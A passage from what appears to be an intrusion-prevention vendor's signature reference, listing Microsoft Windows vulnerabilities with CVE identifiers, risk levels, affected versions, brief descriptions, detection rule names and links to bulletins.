Last changed: sgpkg-ips-1370-5242
Platform: Windows
Software: Windows Server
Type: Input Validation
Description: A vulnerability in the Active Directory Integrated DNS component of Windows, versions Server 2008, 2008 R2, 2012, 2012 R2, 2016, 2019, version 1903, 1909, and 2004, which allows remote attacker to disclose information that could facilitate further compromise, due to the insuffucient handling of certain requests by ADIDNS.
Situation: LDAP_CS-Microsoft-Windows-ADIDNS-Information-Disclosure
References:
CVE-2020-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0856
Back to top

Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-369-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_SS-Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027
File-Text_Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027
References:
CVE-2011-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0027
BID-45698
http://www.securityfocus.com/bid/45698
OSVDB-70444
http://www.osvdb.org/70444
MS11-002
http://technet.microsoft.com/security/bulletin/MS11-002
Back to top

Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0091-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A memory corruption vulnerability exists in Microsoft Windows Adobe Font Driver. The vulnerability is due to improper overwrite of objects in memory when processing crafted fonts. A remote unauthenticated attacker can exploit this vulnerability by enticing a target user to view a maliciously crafted font in an application that utilizes the affected library. Successful exploitation of this vulnerability would result in arbitrary code execution within the Kernel. In case of an unsuccessful code injection attack, the affected system will crash, causing denial of service condition.
Situation: File-Binary_Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0091-Memory-Corruption
References:
CVE-2015-0091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0091
OSVDB-119362
http://www.osvdb.org/119362
MS15-021
http://technet.microsoft.com/security/bulletin/MS15-021
Back to top

Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0092-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A memory corruption vulnerability exists in Microsoft Windows Adobe Font Driver. The vulnerability is due to improper overwrite of objects in memory when processing crafted fonts. A remote unauthenticated attacker can exploit this vulnerability by enticing a target user to view a maliciously crafted font in an application that utilizes the affected library. Successful exploitation of this vulnerability would result in arbitrary code execution within the Kernel. In the case of an unsuccessful code injection attack, the affected system will crash, causing a denial of service condition.
Situation: File-TextId_Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0092-Memory-Corruption
References:
CVE-2015-0092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0092
OSVDB-119363
http://www.osvdb.org/119363
MS15-021
http://technet.microsoft.com/security/bulletin/MS15-021
Back to top

Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_SS-Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249
File-Binary_Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249
References:
CVE-2011-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1249
MS11-044
http://technet.microsoft.com/security/bulletin/MS11-044
Back to top

Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Lync
Risk: High
First detected in: sgpkg-ips-552-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Lync; Microsoft Office; Windows Server
Type: Integer Overflow
Description: An integer overflow vulnerability exists in the way Microsoft Windows, Office and Lync handle certain TIFF image files. When Microsoft's GDI+ library handles a crafted TIFF file it can corrupt memory. A remote attacker could exploit this vulnerability by enticing a user to open a crafted TIFF file, possibly embedded in another file such as Microsoft office document. Successful exploitation could result arbitrary code execution in the context of the currently logged in user.
Situation: File-OLE_Embedded-TIFF-File
File-Binary_TIFF-File
File-Zip_Microsoft-Office-Open-XML-TIFF-Filename-Detected
File-Zip_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-3
File-Binary_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-2
File-Zip_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-1
References:
CVE-2013-3906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3906
BID-63530
http://www.securityfocus.com/bid/63530
OSVDB-99376
http://www.osvdb.org/99376
MS13-096
http://technet.microsoft.com/security/bulletin/MS13-096
Back to top

Microsoft-Windows-Animation-Manager-CVE-2016-7205-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-824-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Internet Explorer
Situation: File-Text_Microsoft-Windows-Animation-Manager-CVE-2016-7205-Memory-Corruption
References:
CVE-2016-7205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7205
MS16-132
http://technet.microsoft.com/security/bulletin/MS16-132
Back to top

Microsoft-Windows-ASX-File-Parsing-Remote-Buffer-Overflow

About this vulnerability: A Microsoft Windows ASX File Parsing Remote Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Microsoft Windows which allows remote attackers to execute arbitrary code via a crafted media file.
Situation: SMTP_CS-Microsoft-Windows-ASX-File-Parsing-Remote-Buffer-Overflow
References:
CVE-2012-0150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0150
BID-51913
http://www.securityfocus.com/bid/51913
Back to top

Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability
File-Exe_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability
File-Exe_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability-2
References:
CVE-2015-2387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2387
MS15-077
http://technet.microsoft.com/security/bulletin/MS15-077
Back to top

Microsoft-Windows-Authentication-Kerberos-NTLM-Fallback-Security-Bypass

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-795-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Windows
Situation: Generic_CS-Microsoft-Windows-Authentication-Kerberos-NTLM-Fallback-Security-Bypass
References:
CVE-2016-3237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3237
MS16-101
http://technet.microsoft.com/security/bulletin/MS16-101
Back to top

Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Microsoft Windows AVI File API. The vulnerability is due to a boundary error when parsing crafted AVI files containing overly large length fields. An attacker could exploit this vulnerability by enticing a target user to open a malicious AVI file.
Situation: HTTP_SS-Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow
File-RIFF_Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow
References:
CVE-2009-1546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1546
BID-35970
http://www.securityfocus.com/bid/35970
OSVDB-56909
http://www.osvdb.org/56909
MS09-038
http://technet.microsoft.com/security/bulletin/MS09-038
Back to top

Microsoft-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-369-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_CSU-Microsoft-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145
SMB-TCP_CHS_MS-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145
References:
CVE-2010-3145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3145
BID-42763
http://www.securityfocus.com/bid/42763
MS11-001
http://technet.microsoft.com/security/bulletin/MS11-001
Back to top

Microsoft-Windows-BranchCache-Insecure-Library-Loading-CVE-2010-3966

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 2008
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_CSU-Microsoft-Windows-BranchCache-Insecure-Library-Loading-CVE-2010-3966
References:
CVE-2010-3966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3966
BID-45295
http://www.securityfocus.com/bid/45295
OSVDB-69816
http://www.osvdb.org/69816
MS10-095
http://technet.microsoft.com/security/bulletin/MS10-095
Back to top

Microsoft-Windows-Briefcase-Integer-Overflow-Vulnerability

About this vulnerability: A vulnerability in Windows
Risk: Moderate
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-Briefcase-Integer-Overflow-Vulnerability
References:
CVE-2012-1528
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1528
BID-56442
http://www.securityfocus.com/bid/56442
OSVDB-87259
http://www.osvdb.org/87259
MS12-072
http://technet.microsoft.com/security/bulletin/MS12-072
Back to top

Microsoft-Windows-Briefcase-Integer-Underflow-Vulnerability

About this vulnerability: A vulnerability in Windows
Risk: Moderate
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-Briefcase-Integer-Underflow-Vulnerability
References:
CVE-2012-1527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1527
BID-56424
http://www.securityfocus.com/bid/56424
OSVDB-87260
http://www.osvdb.org/87260
MS12-072
http://technet.microsoft.com/security/bulletin/MS12-072
Back to top

Microsoft-Windows-Browser-Election-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Microsoft Windows Browser Protocol handler. The vulnerability is due to a heap buffer overflow while parsing a Browser Election packet that contains an overly large ServerName. A remote attacker could exploit this vulnerability by sending a specially crafted packet to a vulnerable installation of Windows. Successful exploitation could result in arbitrary code execution with SYSTEM privileges. Unsuccessful code execution attacks may cause a target system to crash (blue screen), leading to a Denial of Service (DoS) condition.
Situation: NetBIOS-UDP_Microsoft-Windows-Browser-Election-Buffer-Overflow
References:
CVE-2011-0654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0654
BID-46360
http://www.securityfocus.com/bid/46360
MS11-019
http://technet.microsoft.com/security/bulletin/MS11-019
Back to top

Microsoft-Windows-Cab-File-Parsing-Directory-Traversal

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Directory Traversal
Description: Improper handling of paths in CAB files causes a directory traversal vulnerability in Windows. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Microsoft-Windows-Cab-File-Parsing-Directory-Traversal
References:
CVE-2020-1300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1300
Back to top

Microsoft-Windows-Cinepak-Codec-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A remote code execution vulnerability exists in the Microsoft Windows Cinepak Codec.
Situation: HTTP_SS-Microsoft-Windows-Cinepak-Codec-Code-Execution
File-RIFF_Microsoft-Windows-Cinepak-Codec-Code-Execution
References:
CVE-2010-2553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2553
BID-42256
http://www.securityfocus.com/bid/42256
MS10-055
http://technet.microsoft.com/security/bulletin/MS10-055
Back to top

Microsoft-Windows-CLDAP-Out-Of-Bounds-Read-CVE-2024-49113

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1830-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A denial of service vulnerability exists in Windows Server. This vulnerability is due to an out-of-bounds read that can occur during the handling of Connectionless Lightweight Directory Access Protocol (CLDAP) referral responses. A successful exploit can cause LSASS to crash and reboot.
Situation: LDAP-UDP_SS-Microsoft-Windows-CLDAP-Out-Of-Bounds-Read-CVE-2024-49113
References:
CVE-2024-49113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49113
ms24-dec
http://technet.microsoft.com/security/bulletin/ms24-dec
Back to top

Microsoft-Windows-Codecs-Library-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Windows detected
Situation: File-JPEG_Microsoft-Windows-Codecs-Library-Information-Disclosure
References:
CVE-2018-8506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8506
Back to top

Microsoft-Windows-Color-Control-Panel-Insecure-Library-Loading-CVE-2010-5082

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2008
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_CSU-Microsoft-Windows-Color-Control-Panel-Library-Loading-CVE-2010-5082
SMB-TCP_CHS-Microsoft-Windows-Color-Control-Panel-Library-Loading-CVE-2010-5082
References:
CVE-2010-5082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5082
MS12-012
http://technet.microsoft.com/security/bulletin/MS12-012
Back to top

Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A code execution vulnerability exists in Microsoft Windows Common Control Library.
Situation: HTTP_SS-Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow
File-TextId_Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow
References:
CVE-2010-2746
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2746
BID-43717
http://www.securityfocus.com/bid/43717
MS10-081
http://technet.microsoft.com/security/bulletin/MS10-081
Back to top

Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability

About this vulnerability: Possibly malicious ActiveX in an OLE file
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A malicious ActiveX control may allow remote code execution.
Situation: File-OLE_Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability
File-OLE_Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability
File-RTF_Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability
References:
CVE-2013-1313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1313
OSVDB-90166
http://www.osvdb.org/90166
MS13-020
http://technet.microsoft.com/security/bulletin/MS13-020
Back to top

Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: <os>
Type: Input Validation
Description: An insecure library loading vulnerability exists in Microsoft Windows COM+ Services component COMSVCS.DLL. The vulnerability is due to the way that the affected component handles the loading of dynamic link library (.DLL) files. A remote attacker could exploit this vulnerability by enticing a target user to open an Office file from an SMB or WebDAV share. Successful exploitation could result in arbitrary code execution in the security context on the target user.
Situation: File-OLE_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
File-RTF_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
File-TextId_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
References:
CVE-2015-6132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6132
MS15-132
http://technet.microsoft.com/security/bulletin/MS15-132
Back to top

Microsoft-Windows-Contacts-Fnsummaryproc-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1568-5242
Last changed: sgpkg-ips-1568-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper handling of VCF and Contact files causes a remote code execution vulnerability in Windows. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Microsoft-Windows-Contacts-Fnsummaryproc-Remote-Code-Execution
References:
CVE-2022-44666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44666
Back to top

Microsoft-Windows-Credssp-MITM-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There has been reported a remote code execution vulnerability in Microsoft Windows. Successful exploitation of this man-in-the-middle vulnerability could lead to arbitrary code execution in the target machine.
Situation: Generic_SS-Microsoft-Windows-Credssp-MITM-Code-Execution
References:
CVE-2018-0886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0886
Back to top

Microsoft-Windows-CryptoAPI-Spoofing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1216-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There has been reported a spoofing vulnerability in Microsoft Windows. Successful exploitation could trick users to trust the content of website. This situation might generate false-positives in very rare cases. We haven't seen any false-positives to occur in our telemetry.
Situation: TLS_SS-Microsoft-Windows-CryptoAPI-Spoofing-Vulnerability
References:
CVE-2020-0601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0601
Back to top

Microsoft-Windows-CryptoAPI-X.509-Object-Identifiers-Spoofing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows CryptoAPI
Risk: High
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft CryptoAPI
Type: Malfunction
Description: The CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, as used by Internet Explorer and other applications, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, aka "Null Truncation in X.509 Common Name Vulnerability," a related issue to CVE-2009-2408.
Situation: HTTPS_SS-TLS-Certificate-Common-Name-Null-Byte-Input-Validation-Error
References:
CVE-2009-2510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2510
BID-36475
http://www.securityfocus.com/bid/36475
MS09-056
http://technet.microsoft.com/security/bulletin/MS09-056
Back to top

Microsoft-Windows-CVE-2012-0013-Insecure-ClickOnce-Application

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-707-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists vulnerability in Microsoft Windows. A remote attacker can use this to create a malicious Microsoft Office document containing a crafted ClickOnce application, which can lead to arbitrary code execution in the affected machine.
Situation: File-OLE_Microsoft-Windows-CVE-2012-0013-Insecure-ClickOnce-Application
References:
CVE-2012-0013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0013
BID-51824
http://www.securityfocus.com/bid/51824
OSVDB-78207
http://www.osvdb.org/78207
MS12-005
http://technet.microsoft.com/security/bulletin/MS12-005
Back to top

Microsoft-Windows-Devicemetadata-Path-Traversal

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A path traversal vulnerability has been reported in Microsoft Windows. Successful exploitation can lead to remote code execution.
Situation: File-Binary_Microsoft-Windows-Devicemetadata-Path-Traversal
References:
ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan
Back to top

Microsoft-Windows-DFS-Memory-Corruption-CVE-2011-1868

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-398-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: SMB-TCP_Microsoft-Windows-DFS-Memory-Corruption-CVE-2011-1868
References:
CVE-2011-1868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1868
BID-48180
http://www.securityfocus.com/bid/48180
MS11-042
http://technet.microsoft.com/security/bulletin/MS11-042
Back to top

Microsoft-Windows-DHCP-Client-CVE-2019-0547-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There has been reported a code execution vulnerability in Microsoft DHCP Client. This vulnerability could be exploited by sending maliciously crafted DHCP responses to Windows system. Successful exploitation could allow arbitrary code execution on the target system.
Situation: BOOTP_SS-Microsoft-Windows-DHCP-Client-CVE-2019-0547-Code-Execution
References:
CVE-2019-0547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0547
Back to top

Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1866-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There has been reported a code execution vulnerability in Microsoft DHCP Client. A remote attacker is required to send malicious DHCP responses to vulnerable Windows system to exploit this vulnerability. Successful exploitation might lead in arbitrary code execution.
Situation: BOOTP_CS-Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution
BOOTP_SS-Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution
References:
CVE-2019-0697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0697
Back to top

Microsoft-Windows-DHCP-Client-Out-Of-Bounds-Read-CVE-2025-21179

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An out-of-bounds read vulnerability has been reported in Microsoft DHCP Client. The vulnerability is due to improper processing of DHCP messages, causing memory corruption. A remote attacker could exploit this vulnerability by sending maliciously crafted DHCP responses to a vulnerable Windows system. Successful exploitation could result in a denial of service condition.
Situation: BOOTP_CS-Microsoft-Windows-DHCP-Client-Out-Of-Bounds-Read-CVE-2025-21179
References:
CVE-2025-21179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21179
ms25-feb
http://technet.microsoft.com/security/bulletin/ms25-feb
Back to top

Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the DHCP client component of Microsoft Windows. The flaw is caused by the improper processing of crafted DHCP response messages. A remote attacker may leverage this vulnerability by sending a crafted DHCP response to the affected service, resulting in the possible injection and execution of arbitrary code on the target system. Any injected code would be executed within the security context of the System user.
Situation: Generic_UDP-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
BOOTP_CS-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
BOOTP_SS-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
References:
CVE-2006-2372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2372
BID-18923
http://www.securityfocus.com/bid/18923
OSVDB-27151
http://www.osvdb.org/27151
MS06-036
http://technet.microsoft.com/security/bulletin/MS06-036
Back to top

Microsoft-Windows-DHCP-Server-Code-Execution-CVE-2019-0626

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A code execution vulnerability has been reported in Microsoft DHCP Server. The vulnerability is due to improper processing of DHCP messages, causing memory corruption. A remote attacker could exploit this vulnerability by sending maliciously crafted DHCP requests to a vulnerable Windows DHCP server. Successful exploitation of this vulnerability could allow the attacker to execute arbitrary code with the privileges of network service.
Situation: BOOTP_CS-Microsoft-Windows-DHCP-Server-Code-Execution-CVE-2019-0626
References:
CVE-2019-0626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0626
Back to top

Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1635-5242
Platform: Windows
Software: Windows Server
Type: Malfunction
Description: A denial of service vulnerability has been reported in the DHCP Server component of Microsoft Windows. The vulnerability is due to improper handling of DHCP failover packets leading to memory corruption. A remote attacker can exploit this vulnerability by sending crafted DHCP failover packets to the target server. Successful exploitation could result in the server abnormally terminating, resulting in a denial-of-service condition.
Situation: Generic_SS-Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service
Generic_CS-Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service
References:
CVE-2023-38162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38162
ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep
Back to top

Microsoft-Windows-DHCP-Server-Failover-DoS

About this vulnerability: A vulnerability in Microsoft Windows Server.
Risk: High
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Platform: Windows
Software: Windows Server
Type: Malfunction
Description: A vulnerability in the DHCP Server component of Microsoft Windows which allows remote attackers to cause a denial of service condition by sending specially crafted DHCP failover packets to a target server, due to the improper handling of the packets which leads to memory coruption.
Situation: Generic_CS-Microsoft-Windows-DHCP-Server-Failover-DoS
References:
CVE-2019-1206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1206
Back to top

Microsoft-Windows-DHCP-Server-Failover-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A remote code execution vulnerability has been reported in the DHCP Server component of Microsoft Windows. The vulnerability is due to improper handling of DHCP failover packets leading to memory corruption. A remote attacker can exploit this vulnerability by sending crafted DHCP failover packets to the target server. Successful exploitation could result in the execution of arbitrary code with administrative privileges.
Situation: Generic_CS-Microsoft-Windows-DHCP-Server-Failover-Remote-Code-Execution
References:
CVE-2019-0785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0785
ms19-jul
http://technet.microsoft.com/security/bulletin/ms19-jul
Back to top

Microsoft-Windows-DHCP-Server-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Server
Type: Race Condition
Description: A remote code execution vulnerability has been reported in the DHCP Server component of Microsoft Windows. The vulnerability is due to improper handling of DHCP packets. A remote attacker on the local network can exploit this vulnerability by sending crafted DHCP packets to the target server. Successful exploitation could result in the execution of arbitrary code with administrative privileges.
